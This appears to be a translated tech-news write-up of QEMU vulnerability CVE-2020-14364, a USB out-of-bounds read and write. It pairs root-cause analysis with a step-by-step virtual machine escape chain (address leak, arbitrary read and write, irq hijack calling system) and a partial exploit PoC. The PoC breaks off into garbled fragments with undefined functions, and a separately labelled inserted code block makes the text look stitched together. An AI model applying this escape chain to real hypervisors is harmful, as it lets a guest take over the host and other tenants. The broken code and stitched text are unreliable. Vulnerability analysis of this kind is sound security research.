2025-01-19 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)05/31 Report--
This article walks through the analysis of the QEMU vulnerability CVE-2020-14364. The content is quite detailed; interested readers can use it for reference, and I hope it is helpful to you.
Introduction to QEMU
QEMU (Quick Emulator) is a free and open-source hosted virtual machine monitor (VMM) that performs hardware virtualization, originally written by Fabrice Bellard and others.
The USB backend of QEMU has an out-of-bounds read and write vulnerability in the code that implements communication between the USB controller and a USB device, which can lead to a virtual machine escape.
Root cause of the vulnerability
The USB bus communicates with USB devices by creating a USBPacket object.
The USBPacket object contains the following key fields:
struct USBPacket {
    /* Data fields for use by the driver. */
    int pid;
    uint64_t id;
    USBEndpoint *ep;
    ...
};
"pid" indicates the type of packet; there are three types: IN, OUT and SETUP. "ep" points to the endpoint object, through which the target USB device is located.
Data is exchanged between data_buf, a buffer inside the USBDevice, and the buffer mapped by usb_packet_map in the USBPacket object, by means of the usb_packet_copy function. To keep the two buffer lengths from being mismatched, the transfer length is bounded by s->setup_len.
case SETUP_STATE_DATA:
    if (s->setup_buf[0] & USB_DIR_IN) {
        int len = s->setup_len - s->setup_index;
        if (len > p->iov.size) {
            len = p->iov.size;
        }
        usb_packet_copy(p, s->data_buf + s->setup_index, len);
        s->setup_index += len;
        if (s->setup_index >= s->setup_len) {
            s->setup_state = SETUP_STATE_ACK;
        }
        return;
    }
The vulnerability lies in do_token_setup, in the way s->setup_len is assigned.
s->setup_len = (s->setup_buf[7] << 8) | s->setup_buf[6];
if (s->setup_len > sizeof(s->data_buf)) {
    fprintf(stderr,
            "usb_generic_handle_packet: ctrl buffer too small (%d > %zu)\n",
            s->setup_len, sizeof(s->data_buf));
    p->status = USB_RET_STALL;
    return;
}
Although a size check is performed, the value of s->setup_len has already been stored before the check runs, so a stalled SETUP leaves an oversized length behind. When usb_packet_copy is later called from do_token_in or do_token_out with that stale length, the copy reads or writes past the end of data_buf.
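The ordering problem above, as an added example that is not code from the article or from QEMU: a cut-down model of the device state with the original ordering (length stored, then checked) beside the corrected ordering (length checked in a local, then stored), plus a helper that reports how far the data stage would run past data_buf. The struct and function names are assumptions; a false return models the USB_RET_STALL path.

```c
#include <stdint.h>
#include <stdbool.h>
#include <string.h>

/* Assumed cut-down model: only the USBDevice members this bug touches. */
struct usb_dev_model {
    uint8_t setup_buf[8];
    uint8_t data_buf[4096];
    int32_t setup_len;
    int32_t setup_index;
};

/* Vulnerable ordering: wLength is committed to device state before the
 * bounds check, so a rejected (stalled) SETUP still leaves the oversized
 * length behind for the later do_token_in / do_token_out copy. */
bool do_token_setup_vulnerable(struct usb_dev_model *s)
{
    s->setup_len = (s->setup_buf[7] << 8) | s->setup_buf[6];
    if (s->setup_len > (int32_t)sizeof(s->data_buf)) {
        return false;   /* stall, but s->setup_len is already poisoned */
    }
    s->setup_index = 0;
    return true;
}

/* Hardened ordering (the shape of the upstream fix): validate the value
 * in a local first and only store it once it is known to fit. */
bool do_token_setup_fixed(struct usb_dev_model *s)
{
    int setup_len = (s->setup_buf[7] << 8) | s->setup_buf[6];
    if (setup_len > (int)sizeof(s->data_buf)) {
        return false;   /* stall; s->setup_len is left untouched */
    }
    s->setup_len = setup_len;
    s->setup_index = 0;
    return true;
}

/* Bytes the data stage would touch beyond the end of data_buf, using the
 * same length computation as the SETUP_STATE_DATA case; 0 means in bounds. */
int data_stage_overrun(const struct usb_dev_model *s)
{
    int len = s->setup_len - s->setup_index;   /* as in do_token_in */
    int end = s->setup_index + len;            /* one past last byte copied */
    int over = end - (int)sizeof(s->data_buf);
    return over > 0 ? over : 0;
}
```

Running both variants on a SETUP packet whose wLength is 0xffff shows the vulnerable path stalls yet leaves setup_len at 0xffff, while the fixed path stalls and leaves it at its previous value.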
Vulnerability exploitation:
1. Leak the address of the USBDevice object.
Looking at the memory that the out-of-bounds read can reach, we find the following layout:
struct USBDevice {
    ...
    uint8_t setup_buf[8];
    uint8_t data_buf[4096];
    int32_t remote_wakeup;
    int32_t setup_state;
    int32_t setup_len;
    int32_t setup_index;
    USBEndpoint ep_ctl;
    USBEndpoint ep_in[MAX_ENDPOINTS];
    USBEndpoint ep_out[MAX_ENDPOINTS];
    QLIST_HEAD(, USBDescString) strings;
    const USBDesc *usb_desc;        /* Overrides class usb_desc if not NULL */
    const USBDescDevice *device;
    ...
};
The address of the USBDevice object can be read from ep_ctl->dev, which lies just below data_buf.
2. With the USBDevice address we know where s->data_buf is located; we then only need to overwrite the setup_index field below it with (destination address - s->data_buf) to obtain an arbitrary-address write.
3. We also need an arbitrary-address read primitive. setup_buf[0] controls the transfer direction and can normally only be changed by do_token_setup. Because the out-of-bounds write in step 2 was set up with setup_buf[0] in the write direction, at this point we can only write, not read.
Bypass: set setup_index = 0xfffffff8, go out of bounds once more to modify the value of setup_buf[0], and then set setup_index again to the address to be read, which gives an arbitrary-address read.
4. Use the arbitrary read on the USBDevice object to obtain the address of the EHCIState object, then read the EHCIState object to obtain the address of ehci_bus_ops_companion. That address lies in the program's data section, from which the program load address and the address of system@plt can be derived. The load address can also be obtained by reading the usb-tablet object at a fixed offset from the USBDevice.
5. Forge an irq structure inside data_buf.
6. Hijack the irq object in EHCIState with the forged structure.
7. Read a register through MMIO to trigger ehci_update_irq, which executes system("xcalc"), completing the exploit.
Vulnerability PoC code (the source is truncated on the page; the header names were lost in extraction and die() is not defined in the visible portion):
#include <stdio.h>     /* header names restored; original list not visible */
#include <stdint.h>
#include <stdbool.h>
#include <fcntl.h>
#include <unistd.h>

unsigned char *mmio_mem;
char *dmabuf;
struct ohci_hcca *hcca;
struct EHCIqtd *qtd;
struct ohci_ed *ed;
struct ohci_td *td;
char *setup_buf;
uint32_t *dmabuf32;
char *td_addr;
struct EHCIqh *qh;
struct ohci_td *td_1;
char *dmabuf_phys_addr;

typedef struct USBDevice USBDevice;
typedef struct USBEndpoint USBEndpoint;

struct USBEndpoint {
    uint8_t nr;
    uint8_t pid;
    uint8_t type;
    uint8_t ifnum;
    int max_packet_size;
    int max_streams;
    bool pipeline;
    bool halted;
    USBDevice *dev;
    USBEndpoint *fd;
    USBEndpoint *bk;
};

struct USBDevice {
    int32_t remote_wakeup;
    int32_t setup_state;
    int32_t setup_len;
    int32_t setup_index;
    USBEndpoint ep_ctl;
    USBEndpoint ep_in[15];
    USBEndpoint ep_out[15];
};

typedef struct EHCIqh {
    uint32_t next;          /* Standard next link pointer */
    /* endpoint characteristics */
    uint32_t epchar;
    /* endpoint capabilities */
    uint32_t epcap;
    uint32_t current_qtd;   /* Standard next link pointer */
    uint32_t next_qtd;      /* Standard next link pointer */
    uint32_t altnext_qtd;   /* Standard next link pointer */
    uint32_t token;         /* Same as QTD token */
    uint32_t bufptr[5];     /* Standard buffer pointer */
} EHCIqh;

typedef struct EHCIqtd {
    uint32_t next;          /* Standard next link pointer */
    uint32_t altnext;       /* Standard next link pointer */
    uint32_t token;
    uint32_t bufptr[5];     /* Standard buffer pointer */
} EHCIqtd;

uint64_t virt2phys(void *p)
{
    uint64_t virt = (uint64_t)p;
    // Assert page alignment
    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd == -1)
        die("open");
    uint64_t offset = (virt / 0x1000) * 8;
    lseek(fd, offset, SEEK_SET);
    uint64_t phys;
    if (read(fd, &phys, 8) != 8)
        die("read");
    // Assert page present
    phys = (phys & ((1ULL
    /* ... the page's copy of the code is cut off here; the only remaining
       fragment reads: epchar=0x00;qh- > token=1token=1) */